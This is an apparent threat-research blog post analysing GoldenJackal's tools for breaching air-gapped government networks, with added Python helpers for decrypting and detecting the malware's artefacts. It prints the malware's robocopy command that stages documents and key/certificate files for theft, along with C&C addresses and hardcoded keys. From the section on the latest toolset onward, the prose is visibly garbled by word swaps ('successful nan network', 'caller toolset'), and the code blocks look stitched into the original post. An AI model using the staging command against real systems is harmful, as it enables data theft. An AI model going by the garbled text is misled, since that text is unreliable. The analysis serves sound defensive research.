Mind the (air) gap: GoldenJackal gooses government guardrails


ESET researchers discovered a series of attacks on a governmental organization in Europe using tools capable of targeting air-gapped systems. The campaign, which we attribute to GoldenJackal, a cyberespionage APT group that targets government and diplomatic entities, took place from May 2022 to March 2024. By analyzing the toolset deployed by the group, we were able to identify an attack GoldenJackal carried out earlier, in 2019, against a South Asian embassy in Belarus that, yet again, targeted the embassy’s air-gapped systems with custom tools.

This blogpost introduces previously undocumented tools that we attribute to GoldenJackal based on victimology, code, and functional similarities between the toolsets.

Key points of the blogpost:

  • GoldenJackal used a custom toolset to target air-gapped systems at a South Asian embassy in Belarus since at least August 2019. In this blogpost, we describe these tools publicly for the first time.
  • This blogpost also features the first public description of a highly modular toolset GoldenJackal deployed on various occasions between May 2022 and March 2024 against a governmental organization of a country in the European Union.
  • These toolsets provide GoldenJackal a wide set of capabilities for compromising and persisting in targeted networks. Victimized systems are abused to collect interesting information, process the information, exfiltrate files, and distribute files, configurations and commands to other systems.
  • The ultimate goal of GoldenJackal seems to be stealing confidential information, especially from high-profile machines that might not be connected to the internet.

GoldenJackal profile

GoldenJackal is an APT group active since at least 2019. It targets government and diplomatic entities in Europe, the Middle East, and South Asia. The group is little known and was only publicly described in 2023 by Kaspersky. The group’s known toolset includes several implants written in C#: JackalControl, JackalSteal, JackalWorm, JackalPerInfo, and JackalScreenWatcher – all of them used for espionage.

Overview

In May 2022, we discovered a toolset that we could not attribute to any APT group. But once the attackers used a tool similar to one of those publicly documented by Kaspersky, we were able to dig deeper and to find a connection between the publicly documented toolset of GoldenJackal and this new one.

Extrapolating from that, we managed to identify an earlier attack where the publicly documented toolset was deployed, as well as an older toolset that also has capabilities to target air-gapped systems. This blogpost shines a light on the technical aspects of the publicly undocumented toolsets, and shares some insights about GoldenJackal’s tactics, techniques, and procedures.

Victimology

GoldenJackal has been targeting governmental entities in Europe, the Middle East, and South Asia. We detected GoldenJackal tools at a South Asian embassy in Belarus in August and September 2019, and again in July 2021.

Kaspersky reported a limited number of attacks against government and diplomatic entities in the Middle East and South Asia, starting in 2020.

More recently, according to ESET telemetry, a governmental organization of a country in the European Union was repeatedly targeted from May 2022 until March 2024.

Attribution

All the campaigns that we describe in this blogpost deployed, at some point, at least one of the tools attributed to the GoldenJackal APT group by Kaspersky. As was the case in the Kaspersky report, we can’t attribute GoldenJackal’s activities to any specific nation-state. There is, however, one clue that might point towards the origin of the attacks: in the GoldenHowl malware, the C&C protocol is referred to as transport_http, which is an expression typically used by Turla (see our ComRat v4 report) and MoustachedBouncer. This may indicate that the developers of GoldenHowl are Russian speakers.

Breaching air-gapped systems

In order to minimize the risk of compromise, highly sensitive networks are often air gapped, i.e., isolated from other networks. Usually, organizations will air gap their most valuable systems, such as voting systems and industrial control systems running power grids. These are often precisely the networks that are of most interest to attackers.

As we stated in a previous white paper titled Jumping the air gap: 15 years of nation-state effort, compromising an air-gapped network is much more resource-intensive than breaching an internet-connected system, which means that frameworks designed to attack air-gapped networks have so far been exclusively developed by APT groups. The purpose of such attacks is always espionage, perhaps with a side of sabotage.

With the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not one, but two separate toolsets designed to compromise air-gapped systems. This speaks to the resourcefulness of the group. The attacks against a South Asian embassy in Belarus made use of custom tools that we have only seen in that specific instance. The campaign used three main components: GoldenDealer to deliver executables to the air-gapped system via USB monitoring; GoldenHowl, a modular backdoor with various functionalities; and GoldenRobo, a file collector and exfiltrator.

In the latest series of attacks against a government organization in Europe, GoldenJackal moved on from the original toolset to a new, highly modular one. This modular approach applied not only to the design of the malicious tools (as was the case with GoldenHowl), but also to their roles: they were used, among other things, to collect and process interesting information, to distribute files, configurations, and commands to other systems, and to exfiltrate files.

Technical analysis

Initial access

So far, we haven’t been able to trace back to the initial compromise vector in the campaigns seen in our telemetry. Note that Kaspersky reported in a blogpost that GoldenJackal used trojanized software and malicious documents for this purpose.

The mysterious toolset from 2019

The earliest attack that we have attributed to GoldenJackal, which targeted a South Asian embassy in Belarus, occurred in August 2019. The toolset used in this attack is, to the best of our knowledge, publicly undocumented. We’ve only observed the following custom tools once, and never again:

  • A malicious component that can deliver executables to air-gapped systems via USB drives. We’ve named this component GoldenDealer.
  • A backdoor, which we’ve named GoldenHowl, with various modules for malicious capabilities.
  • A malicious file collector and exfiltrator, which we’ve named GoldenRobo.

An overview of the attack is shown in Figure 1. The initial attack vector is unknown, so we assume that GoldenDealer and an unknown worm component are already present on a compromised PC that has access to the internet. Whenever a USB drive is inserted, the unknown component copies itself and the GoldenDealer component to the drive. While we didn’t observe this unknown component, we have seen components with similar purposes – such as JackalWorm – in other toolsets used in later attacks performed by the group.

Figure 1. Overview of the initial compromise of an air-gapped system

It is likely that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is what JackalWorm does. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is what JackalWorm does.

When the drive is again inserted into the internet-connected PC, GoldenDealer takes the information about the air-gapped PC from the USB drive and sends it to the C&C server. The server replies with one or more executables to be run on the air-gapped PC. Finally, when the drive is again inserted into the air-gapped PC, GoldenDealer takes the executables from the drive and runs them. Note that this time no user interaction is needed, because GoldenDealer is already running.

We have observed GoldenDealer running GoldenHowl on an internet-connected PC. While we didn’t observe GoldenDealer directly executing GoldenRobo, we observed the latter also running on the connected PC, used to take files from the USB drive and exfiltrate them to its C&C server. There must be yet another unknown component that copies files from the air-gapped PC to the USB drive, but we haven’t observed it yet.

GoldenDealer

This component monitors the insertion of removable drives on both air-gapped and connected PCs, as well as internet connectivity. Based on the latter, it can download executable files from a C&C server and hide them on removable drives, or retrieve them from these drives and execute them on systems that have no connectivity.

The program can be run with or without arguments. When run with arguments, it takes a path to a file that it moves to a new location and then runs via the CreateProcessW API without creating a window.

To prevent hidden files being shown in Windows Explorer, GoldenDealer creates the ShowSuperHidden value in the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced registry key, and sets it to zero.

In case GoldenDealer is not running as a service, it creates and starts a service called NetDnsActivatorSharing, then exits. If for some reason the service couldn’t be created, persistence is achieved by creating an entry in a Run registry key.

Table 1 shows the list of configuration files used by GoldenDealer. These are located in the directory from which the malware is running: C:\Windows\TAPI in the observed attack. More details about these files are provided in subsequent sections.

Table 1. Configuration files used by GoldenDealer

Filename  Purpose 
b8b9-de4d-3b06-9d44  Stores status fields. 
fb43-138c-2eb0-c651  Stores executable files sent by the C&C server. 
130d-1154-30ce-be1e  Stores information about all compromised PCs in the network. 
38c4-abb9-74f5-c4e5  Used as a mutex. If this file is open, it means that an instance of GoldenDealer is already running. 

The contents of the configuration files are JSON formatted, and stored XOR encrypted on disk. XOR encryption is performed one byte at a time, with a single-byte key that is incremented based on a multiplier.
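The following is an added example, not GoldenDealer’s code, of how an analyst can model and undo this kind of rolling-key XOR when examining a recovered configuration file. The page states only that the key is a single byte incremented based on a multiplier; the exact update rule (here assumed to be key_i = key + i·multiplier mod 256), the real key and multiplier, and the sample status file are all assumptions constructed for the example. Because the key space is only 256 × 256, the example also shows how to recover the parameters from a blob by requiring the output to parse as a JSON object.

```python
import json

# Added example, not GoldenDealer's code. Assumed keystream model:
# the single-byte key advances by `multiplier` (mod 256) for every byte processed.

def keystream(key, multiplier, length):
    """Rolling key: starts at `key`, advances by `multiplier` per byte (assumption)."""
    k = key & 0xFF
    out = []
    for _ in range(length):
        out.append(k)
        k = (k + multiplier) & 0xFF
    return out

def xor_rolling(data, key, multiplier):
    """XOR is symmetric, so the same routine encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, keystream(key, multiplier, len(data))))

def load_config(blob, key, multiplier):
    """Decrypt a GoldenDealer-style configuration file and parse the JSON object inside."""
    return json.loads(xor_rolling(blob, key, multiplier).decode("utf-8"))

def recover_parameters(blob):
    """Analyst helper: try every (key, multiplier) pair and keep those that yield a
    JSON object. Only keys that decrypt the first byte to '{' are worth parsing."""
    if not blob:
        return []
    hits = []
    for key in range(256):
        if blob[0] ^ key != ord("{"):
            continue
        for mult in range(256):
            try:
                obj = json.loads(xor_rolling(blob, key, mult).decode("utf-8"))
            except (UnicodeDecodeError, ValueError):
                continue
            if isinstance(obj, dict):
                hits.append((key, mult))
    return hits

# Constructed sample: a status file using the field names reported for
# b8b9-de4d-3b06-9d44, encrypted with an arbitrary key/multiplier chosen here.
SAMPLE_KEY, SAMPLE_MULT = 0x5A, 7
SAMPLE_PLAINTEXT = b'{"wmk": 2, "qotwnk": 0, "ltwnk": 0, "rpk": []}'
SAMPLE_BLOB = xor_rolling(SAMPLE_PLAINTEXT, SAMPLE_KEY, SAMPLE_MULT)

if __name__ == "__main__":
    print(load_config(SAMPLE_BLOB, SAMPLE_KEY, SAMPLE_MULT))
    print(recover_parameters(SAMPLE_BLOB))
```

If the real sample used a different update rule, only `keystream` needs to change; `recover_parameters` still works as long as the keystream is fully determined by two bytes.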

Network connectivity thread

In order to determine whether a PC is connected to the internet, GoldenDealer sends a GET request to https://1.1.1.1/<user_id> every 15 minutes. If the connection fails, or there’s no reply, the PC is assumed to be offline. 1.1.1.1 maps to Cloudflare’s DNS resolver, and the expected behavior is to receive a Not Found document and a 404 status code. The <user_id> part is not relevant here, but is used for C&C communication. GoldenDealer generates this user identifier based on:

  • The current username as retrieved via the GetUserNameW API.
  • The serial number of the first available logical drive in the system. This is not necessarily the drive where the OS is installed.

These two strings are separately hashed with the FNV-1a function, and the resulting numbers are XORed together, obtaining a number that identifies the user.
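The identifier scheme above is easy to reproduce, which is useful on the defensive side: a `<user_id>` seen in proxy logs for the 1.1.1.1 or C&C URLs can be matched back to a host by hashing the username and volume serial from an inventory. The code below is an added example, not GoldenDealer’s code; the hash width (32 or 64 bits), the string encoding, and the way the serial is rendered as text are not stated on the page and are assumptions here, as is the constructed inventory.

```python
# Added example, not GoldenDealer's code. FNV-1a parameters are the public ones;
# hash width, encoding, and serial formatting are assumptions.
FNV_PARAMS = {
    32: (0x811C9DC5, 0x01000193, 0xFFFFFFFF),
    64: (0xCBF29CE484222325, 0x100000001B3, 0xFFFFFFFFFFFFFFFF),
}

def fnv1a(data: bytes, bits: int = 32) -> int:
    """Standard FNV-1a: XOR the byte in, then multiply by the prime."""
    offset, prime, mask = FNV_PARAMS[bits]
    h = offset
    for b in data:
        h ^= b
        h = (h * prime) & mask
    return h

def user_id(username: str, volume_serial: str, bits: int = 32, encoding: str = "utf-8") -> int:
    """Model of the identifier: FNV-1a of each input, XORed together."""
    return fnv1a(username.encode(encoding), bits) ^ fnv1a(volume_serial.encode(encoding), bits)

def match_observed_id(observed: int, hosts, bits: int = 32):
    """hosts: iterable of (hostname, username, volume_serial); returns hostnames whose
    computed id equals the value observed in network logs."""
    return [name for name, user, serial in hosts if user_id(user, serial, bits) == observed]

# Constructed inventory (hostname, logged-on user, serial of the first logical drive).
INVENTORY = [
    ("ws-01", "alice", "1A2B-3C4D"),
    ("ws-02", "bob", "5E6F-7A8B"),
    ("ws-03", "carol", "9C0D-1E2F"),
]

if __name__ == "__main__":
    seen = user_id("bob", "5E6F-7A8B")
    print(hex(seen), match_observed_id(seen, INVENTORY))
```

Note that XOR makes the combination order-independent, and that two hosts sharing both a username and a drive serial would collide; both are properties of the scheme as described, not of this example.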

To keep track of network connectivity status, GoldenDealer uses a global variable that can hold any of the following values:

  • 0 – Malware started running and connectivity has not been checked.
  • 1 – PC doesn’t have internet connectivity.
  • 2 – PC has internet connectivity.

If the status is 2, a thread is signaled to download executable files from the C&C server, and another thread is signaled to copy the executables to USB drives. A thread to get executables from drives and run them will only be signaled when the status is 1. Whenever the status changes, the configuration file b8b9-de4d-3b06-9d44 is updated with the new value. Fields in this file are:

  • wmk – network connectivity status.
  • qotwnk – number of seconds without internet. This value is incremented every 15 minutes and reset to zero when there’s connectivity. It can be used if the malware is configured to wait a minimum number of seconds before deciding that the PC has no connectivity, but there was no wait in the samples that we observed.
  • ltwnk – unknown. This field is not used by the malware.
  • rpk – list with hashes of executables downloaded from the C&C server.

Downloader thread

This thread checks the network connectivity status every 30 minutes, and only performs the following actions if the PC is connected to the internet. First, a GET request is sent to https://83.24.9[.]124/<user_id>, just to let the C&C server know that another request is to follow. The reply from the server is not processed. If the request fails, then another request is sent to a secondary server, http://196.29.32[.]210/<user_id>, most likely to notify about the failure, as the thread doesn’t continue to execute in this case. The URLs are hardcoded in the malware and are not configurable in the samples that we observed.

When communication is successful, GoldenDealer sends a request to https://83.24.9[.]124/<user_id>/fc93-10f4-2a68-d548. The server replies with an array of JSON objects with the following fields:

  • ek – a base64-encoded string that is an executable file after being decoded,
  • tpik – an array of user_ids used to decide whether the executable will be run,
  • hek – the FNV-1a hash of ek, and
  • apk – date and time when the executable was obtained from the C&C server.

The contents of the last two fields are not relevant, because they are calculated by the downloader thread, replacing the original data sent by the C&C server. In both cases, they are stored as decimal numbers.

GoldenDealer will run an executable sent by the server if the corresponding user_id is in the tpik list, and the hek hash is not in the list of hashes stored in the rpk field in the configuration. In other words, connected PCs can download executables and pass them on to other systems via USB drives, but they can also run received executables. When an executable is run, its hash is added to the rpk list, ensuring that it will only be executed once by that victim. Each executable is written in the working directory with the value of <hek> as its filename. All JSON objects with received executables are stored on disk, in the file fb43-138c-2eb0-c651.

As the last step, the downloader thread collects information about the compromised system and sends it to https://83.24.9[.]124/<user_id>/a1e7-4228-df20-1600. The configuration file 130d-1154-30ce-be1e is updated to store this information as well. Figure 2 shows part of the JSON object with the information sent to the C&C server. While all strings are sent as arrays of decimal character codes, for readability we show them as strings in the image. For example, instead of lsass.exe, the value [108, 115, 97, 115, 115, 46, 101, 120, 101] is actually sent.

Figure 2. Part of the information sent by the downloader thread to the C&C server

The members are:

  • iepk – a Boolean value that indicates whether the GoldenDealer process is elevated,
  • pclk – an array of running processes,
  • pglk – an array of installed programs in both the Program Files and Program Files (x86) directories,
  • pik – the user_id,
  • sik – information about the operating system (including version, build, service pack number; architecture; and Boolean values indicating whether the OS is running on a server, domain controller, or workstation),
  • uck – the user who is running the GoldenDealer process, and
  • ulk – an array of all users, each with a Boolean value indicating whether the user has administrator privileges.

USB monitoring thread on connected PCs

GoldenDealer monitors the insertion of removable drives by creating a window titled defaultWindow with a custom event handler that processes inserted devices and ignores all other system events.

Once a USB drive has been inserted, this thread patches one byte in the master boot record (MBR) of that drive: it searches for the offset where the BOOTMGR string resides, and replaces the first O with 0. Then it checks whether the second O has also been patched to 0, and exits if it hasn’t. The USB thread that runs on air-gapped PCs does the opposite: it patches the second O, and checks whether the first has already been patched. This means that the USB drive needs to have been inserted in both a connected PC and an air-gapped PC for the drive to be processed.
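The two patched bytes are a durable, cheap-to-check indicator: a drive that has passed through this mechanism carries B0OTMGR, BO0TMGR or B00TMGR in its boot sector instead of BOOTMGR. The code below is an added example, not GoldenDealer’s code, that classifies the first sector of a drive image by which side(s) have stamped it, and can restore the original string. The 512-byte sample sectors are constructed; the offset used for the string is arbitrary, since where BOOTMGR sits depends on the drive’s boot code and layout.

```python
import re

# Added example, not GoldenDealer's code: look for the BOOTMGR string with either
# 'O' possibly replaced by the digit '0' (0x30 instead of 0x4F).
MARKER = re.compile(rb"B[O0][O0]TMGR")

def find_marker(sector: bytes):
    """Return (offset, 7-byte marker) of the first BOOTMGR variant, or None."""
    m = MARKER.search(sector)
    return (m.start(), m.group(0)) if m else None

def marker_state(sector: bytes) -> str:
    """Classify a boot sector by which of the two O's have been turned into 0."""
    found = find_marker(sector)
    if found is None:
        return "no_marker"
    marker = found[1]
    first_patched = marker[1] == ord("0")    # patched by the thread on connected PCs
    second_patched = marker[2] == ord("0")   # patched by the thread on air-gapped PCs
    if first_patched and second_patched:
        return "both_sides"
    if first_patched:
        return "connected_side"
    if second_patched:
        return "airgapped_side"
    return "clean"

def restore_marker(sector: bytes) -> bytes:
    """Return the sector with the original BOOTMGR string put back (for remediation)."""
    found = find_marker(sector)
    if found is None:
        return sector
    off = found[0]
    return sector[:off] + b"BOOTMGR" + sector[off + 7:]

def audit_image(path: str) -> str:
    """Classify the first sector of a raw drive image on disk."""
    with open(path, "rb") as f:
        return marker_state(f.read(512))

def make_sector(marker: bytes = b"BOOTMGR", offset: int = 0x17B) -> bytes:
    """Constructed 512-byte test sector: zeros, the marker at an arbitrary offset,
    and the 0x55AA boot signature. Real boot code is not reproduced."""
    sec = bytearray(512)
    sec[offset:offset + len(marker)] = marker
    sec[510], sec[511] = 0x55, 0xAA
    return bytes(sec)

if __name__ == "__main__":
    for m in (b"BOOTMGR", b"B0OTMGR", b"BO0TMGR", b"B00TMGR"):
        print(m.decode(), "->", marker_state(make_sector(m)))
```

A "both_sides" result on a drive from an environment that is supposed to be air gapped is the strongest signal, because it means the same stick has been mounted on a connected machine and on an isolated one.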

If the check is successful, a hidden directory is created on the USB drive, with two files written inside:

  • 37b3-ebe5-568e-0676 – this file has the same contents as fb43-138c-2eb0-c651 (all the executables sent by the C&C server). It’s used to pass the executables to air-gapped systems, for execution.
  • bc41-ac6f-e55e-61a8 – a file with information from air-gapped PCs. It’s created empty by this thread, then populated by the USB thread running on air-gapped PCs. The contents of this file are appended to the local file 130d-1154-30ce-be1e (see Table 1), to be sent to the C&C server by the downloader thread.

USB monitoring thread on air-gapped PCs

This is complementary to the thread described in the previous section: it takes the file 37b3-ebe5-568e-0676 with executables on the USB drive and copies its contents to the local file fb43-138c-2eb0-c651. It also takes the local file 130d-1154-30ce-be1e with information about the air-gapped system and adds its contents to the bc41-ac6f-e55e-61a8 file on the USB drive. The code to get system information and to run executables is contained in this thread.

GoldenHowl

Another tool from GoldenJackal’s 2019 toolset is GoldenHowl, a backdoor written in Python that consists of various modules for malicious functionalities. It is distributed as a self-extracting archive that contains legitimate Python binaries and libraries, as well as malicious scripts. Figure 3 shows the contents of one of these archives. The attackers renamed the Python executable – in version 2.7.15 – as WinAeroModule.exe. This component is intended to be run on PCs with internet connectivity, given its functionalities.

Figure 3. Contents of GoldenHowl’s self-extracting archive

The first script in GoldenHowl, referred to as core_script in the malware’s configuration file, performs the following actions:

  • decrypts and loads the malware’s configuration from a JSON file,
  • creates directories used by the malware, and
  • starts a thread for each module.

The malware’s configuration is decrypted using the Fernet algorithm, with the hardcoded key _ylmUTbqcx6FxMZ5ZvNxDQZYuNh41yxhKcPJLzxgqEY=. Figure 4 shows part of the decrypted configuration.

Figure 4. Part of GoldenHowl’s decrypted configuration

Table 2 shows the Python modules that we’ve observed – in the order that they appear in the config – along with a description of their functionalities. All modules run indefinitely, except for the persistence_schtasks module, which runs only once.

Table 2. Malicious modules in GoldenHowl

Module name  File on disk  Description 
persistence_schtasks  5991-8d44-b226-0e6c.py  Creates the scheduled task Microsoft\Windows\Multimedia\SystemSoundsService2 to persist the execution of core_script. 
files_tree  edc5-4055-37cd-d2d2.py  Generates a listing of files and directories by calling Windows’ tree command, for a path specified in a request sent by the C&C. 
files_stealer  5488-240b-c00f-203a.py  Exfiltrates a single file to the C&C server. The file path is specified in a request sent by the C&C. 
data_transform  8744-a287-35be-4ea0.py  Utility module that takes incoming requests from the C&C server and decrypts them, and takes responses from other modules that need to be sent to the C&C and encrypts them. The encryption algorithm is Fernet, and the key is specific to this module: QRqXhd_iB_Y3LpT2wTVK6Dao5uOq2m5KMiVkMnJfgw4= 
transport_http  63d5-be5f-e4df-7e65.py  Utility module that uploads and downloads files from the C&C server. See the C&C communication section for more information. Note that the word transport is commonly used by Turla and MoustachedBouncer to refer to a type of C&C protocol. Although this might be shared across Russian-speaking developers, this is a low-confidence element for attribution. 
updater  c7b4-0999-aec4-a0c8.py  Utility module that receives a ZIP archive with updated modules or configuration from the C&C server, extracts the archive, and runs core_script in a new process, terminating the current process. 
sshcmd  1ee0-7c3a-3331-4df3.py  Connects to an SSH server specified in a request sent by the C&C. Acts as a reverse shell, executing commands received from the C&C. 
ipscanner  a86b-108c-36c7-6972.py  Generates a listing with active IP addresses in an IP range, based on an IP mask specified in a request sent by the C&C server. To do so, it first sends a message to all IP addresses in the range, on port 59173, and then it runs the command arp -a to get the ARP cache tables for all interfaces. 
portscanner  2648-69f9-6dc0-3476.py  Generates a listing with ports that are accepting connections, based on an IP address and a list of ports specified in a request sent by the C&C server. 
sshtunnel  9ea4-fb87-6d57-924a.py  Creates an SSH tunnel with an SSH server, to forward messages going from (and to) a host on a listening port, to a forwarding port on the SSH server. A request from the C&C server specifies: the address and port of the SSH server, username and password for the SSH session, the forwarding port on the SSH server, and the address and port of the listening host. 
eternalbluechecker  4b19-7f72-8c17-dceb.py  Checks whether a host, specified in a request sent by the C&C server, is vulnerable to a Windows SMB remote code execution vulnerability. The code for this module is the same as in mysmb.py and checker.py from this public repository. There is no code in this module to exploit vulnerable hosts. 
socks_proxy  8b55-3ac9-5c30-d0c4.py  Acts as a proxy server, forwarding packets from a source address to a destination address. The port to listen on for incoming connections is specified in a request sent by the C&C server. The code in this module is very similar to that of pysoxy. 
text_writer  0ffc-667e-dce4-b270.py  Writes a text file to a given path. The path and text to write are specified in a request sent by the C&C server. 

C&C communication

According to GoldenHowl’s configuration, anything that comes from the C&C server is called a request, and files going to the C&C server represent a response. It should be noted that despite this naming convention, GoldenHowl is not a passive implant: it initiates the connections to the C&C server. The transport_http module is responsible for communication with the C&C server, and for writing requests and responses to specific directories. Table 3 shows the directories used by GoldenHowl.

Table 3. Directories in GoldenHowl’s configuration

Name in configuration  Name on disk  Description 
download_dir  a700-280c-f067-5a06  Stores encrypted requests coming from the C&C server. 
upload_dir  b307-05ea-7ac8-c369  Stores encrypted responses, with files or output of commands, to be sent to the C&C server. 
data_dir  cda2-b818-3403-b564  Stores requests sent by the C&C server, which are taken from download_dir, decrypted, and placed in this directory for modules to process. Also stores output of executed commands (responses), which are taken from this directory, encrypted, and written to upload_dir. These actions are performed by the data_transform module. 
temp_dir  5bc5-0788-d469-2f3a  This directory was not used in any observed modules. 

Requests and responses have structured filenames:

  • Request – <client_id><module_id><request_id><request_suffix>
  • Response – <client_id><module_id><request_id><response_suffix>

The fields client_id, request_suffix, and response_suffix are specified in the configuration and are common to all modules (see Figure 4 for examples). The field module_id indicates which module needs to process a request or generate a response, and is defined in the configuration section of each individual module. The field request_id is generated on the C&C server, and ties together requests with responses.
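Because the filename layout is fixed and every field but request_id comes from the configuration, the leftover files in download_dir, data_dir and upload_dir can be parsed to reconstruct what the operators tasked and which tasks were answered. The parser below is an added example, not GoldenHowl’s code. The client_id 8102 is the value the page reports; the suffixes, module ids and filenames are constructed for the example and are not the real configuration values.

```python
# Added example, not GoldenHowl's code. Constructed configuration: client_id 8102 is
# from the report, the suffixes and module ids are invented for illustration.
CONFIG = {
    "client_id": "8102",
    "request_suffix": ".req",
    "response_suffix": ".rsp",
    "modules": {"files_tree": "ft", "files_stealer": "fs", "text_writer": "tw"},
}

def parse_filename(name, config=CONFIG):
    """Split <client_id><module_id><request_id><suffix> into its fields, or None."""
    cid = config["client_id"]
    if not name.startswith(cid):
        return None
    rest = name[len(cid):]
    for kind, suffix in (("request", config["request_suffix"]),
                         ("response", config["response_suffix"])):
        if suffix and rest.endswith(suffix):
            body = rest[:-len(suffix)]
            break
    else:
        return None
    # module ids are per-module strings; try the longest first so that one id
    # being a prefix of another cannot mis-assign the file
    for module, mid in sorted(config["modules"].items(), key=lambda kv: -len(kv[1])):
        if body.startswith(mid) and len(body) > len(mid):
            return {"kind": kind, "module": module, "request_id": body[len(mid):]}
    return None

def correlate(names, config=CONFIG):
    """Group files by request_id: {request_id: {"module": m, "request": f, "response": f}}."""
    out = {}
    for n in names:
        p = parse_filename(n, config)
        if p:
            out.setdefault(p["request_id"], {"module": p["module"]})[p["kind"]] = n
    return out

def unanswered(names, config=CONFIG):
    """request_ids that have a request file but no response file yet."""
    return sorted(rid for rid, v in correlate(names, config).items() if "response" not in v)

# Constructed directory listing, as a forensic image of data_dir might show it.
SAMPLE_FILES = ["8102ft0001.req", "8102ft0001.rsp", "8102fs0002.req", "8102tw0003.req",
                "8102tw0003.rsp", "notes.txt", "8102zz0004.req"]

if __name__ == "__main__":
    for rid, info in sorted(correlate(SAMPLE_FILES).items()):
        print(rid, info)
    print("unanswered:", unanswered(SAMPLE_FILES))
```

The timeline this yields (tasked modules, paths requested, which responses were produced) is usually more useful to incident responders than the individual files, because the requests are the operators’ own record of what they wanted from the host.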

The transport_http module sends GET requests periodically to the C&C server to check for available requests. The configuration fields specific to this module are:

  • server_address – address of the C&C server (we observed 83.24.9[.]124, the same address as GoldenDealer’s server),
  • server_port – the port used to communicate with the server (we observed 443),
  • server_use_ssl – indicates whether HTTP or HTTPS will be used for communication,
  • base_timeout_sec – the minimum wait time before contacting the C&C server, and
  • timeout_filename – the filename of a text file with a number between 0 and 3600, to specify a different number of seconds to wait between communications. This file is not included with GoldenHowl, but it could be placed by the attackers with the text_writer module.

The address used to contact the C&C server is https://<server_address>:<server_port>/<client_id>/.

GoldenRobo

The last of the observed tools from the 2019 toolset, GoldenRobo, is a simple component written in Go that executes the Robocopy utility to stage files and send them to its C&C server. It iterates across all drive letters from A to Z, trying to access each drive. If successful, a Robocopy command is constructed:

robocopy <drive_letter>:\ <malware_folder>\1516-fe89-ad12-8102\<drive_letter>\ *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.pdf *.rtf *.tif *.jpg *.jpeg *.crt *.key *.p12 *.ovpn *.zip *.rar "" /S /R:0 /MAXAGE:7 /XD <malware_folder>\1516-fe89-ad12-8102\\ 1516-fe89-ad12-8102\\ "Application Data" "All Users" "Documents and Settings" "Local Settings"

If we break down the command:

  • files are copied from drive_letter,
  • to <malware_folder>\1516-fe89-ad12-8102\<drive_letter>\ (for example: C:\Windows\TAPI\1516-fe89-ad12-8102\C\),
  • only if the files have the extensions .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .jpg, .jpeg, .crt, .key, .p12, .ovpn, .zip, or .rar,
  • including subdirectories (/S),
  • not retrying on failed copies (/R:0),
  • excluding files older than 7 days (/MAXAGE:7), and
  • excluding the specified directories (/XD).

Copied files from all drives are archived together in a ZIP file _1423-da77-fe86<month>-<day> in the same directory where GoldenRobo is running (with <month> and <day> corresponding to the current date).

The archive is sent base64 encoded to https://83.24.9[.]124/8102/. The last part of the URL is 8102, which is the same as the client_id field in GoldenHowl’s configuration. This URL is hardcoded in GoldenRobo, which tells us that the attackers compiled this version of GoldenRobo for this victim exclusively.

The known toolset: Previously documented by Kaspersky

A few weeks after deploying the previous toolset, GoldenJackal started to use other malicious tools on the same compromised computers. In September 2019, we observed the execution of PowerShell scripts to download the JackalControl backdoor. This backdoor was used to execute other PowerShell scripts, and to download and run legitimate tools such as Plink and PsExec.

In various attacks, between September 2019 and January 2024, we observed the following tools in GoldenJackal’s arsenal:

  • JackalControl,
  • JackalSteal, a file collector and exfiltrator, and
  • JackalWorm, used to propagate other malicious components via USB drives. We observed it propagating the JackalControl backdoor.

As these components have already been documented by Kaspersky, we will not describe them in this blogpost. However, one interesting element to mention is that in early versions of these tools, URLs for C&C servers were hardcoded in the malware binaries. At some point, GoldenJackal modified JackalControl and JackalSteal to receive C&C servers as arguments.

The latest toolset: Keeping a foothold successful nan network

In May 2022, we observed GoldenJackal utilizing a caller toolset while targeting a governmental statement successful Europe. Most of these devices are written successful Go and supply divers capabilities, specified arsenic collecting files from USB drives, spreading payloads successful nan web via USB drives, exfiltrating files, and utilizing immoderate PCs successful nan web arsenic servers to present divers files to different systems. In addition, we person seen nan attackers utilizing Impacket to move laterally crossed nan network.

In nan observed attacks, GoldenJackal started to usage a highly modular approach, utilizing various components to execute different tasks. Some hosts were abused to exfiltrate files, others were utilized arsenic section servers to person and administer staged files aliases configuration files, and others were deemed absorbing for record collection, for espionage purposes. Figure 5 shows a classification of nan components that are described complete nan adjacent sections.

Figure 5. Components successful GoldenJackal’s latest toolset

Regarding web infrastructure, we didn’t observe immoderate outer IP addresses successful immoderate of nan analyzed components. File exfiltrators usage publically disposable services specified arsenic Google Drive aliases Outlook SMTP servers.

GoldenUsbCopy

GoldenUsbCopy, which we categorize as a collection component, monitors the insertion of USB drives, and copies interesting files to an encrypted container that is stored on disk, to be exfiltrated by other components. According to strings found in the binary, the main package of the application is named UsbCopy.

Newly inserted drives are detected by creating a window named WindowsUpdateManager, to receive system events and process them with a custom handler. If the handler receives a WM_DEVICECHANGE message with the event type DBT_DEVICEARRIVAL, and the device type is DBT_DEVTYP_VOLUME, this means a new drive is ready to be processed. Figure 6 shows a side-by-side comparison of decompiled code in GoldenUsbCopy and GoldenDealer. Even though each was written in a different programming language, we can see that the code retrieves the letter of the drive to process in the same manner.

Figure 6. Code comparison between GoldenUsbCopy and GoldenDealer

GoldenUsbCopy determines which files to process from a USB drive based on a configuration that is stored AES encrypted in CFB mode in the file reports.ini. The 32-byte key to decrypt the configuration is hardcoded in the malware. After decryption, the configuration contains the following fields, in JSON format:

  • outputCipherFilename – full path to an encrypted archive that acts as a container for other files, such as files that contain listings of filenames from newly inserted drives, and files to be exfiltrated,
  • RSAKey – a public key used to encrypt the AES keys that encrypt the files to be exfiltrated,
  • lastDate – files that were last modified more than lastDate days ago are not processed,
  • registryKey – a key in HKEY_CURRENT_USER that will store SHA-256 hashes of files already processed for exfiltration,
  • registryValue – the registry value that stores the list of hashes,
  • maxZIPSize – the maximum size in bytes for outputCipherFilename (more details below),
  • maxFileSize – files larger than maxFileSize, in bytes, are not exfiltrated, and
  • extensionsFile – a list of file extensions for exfiltration (we observed .docx, .pdf, .doc, and .odt).

Once the configuration is decrypted, GoldenUsbCopy waits for a USB drive to be inserted. A listing of all files on the inserted drive is written to a text file, which is then archived in a ZIP file, encrypted with AES, and added to outputCipherFilename. Only the encrypted container is written to disk; the intermediate steps, involving text files and archives, are kept in memory.

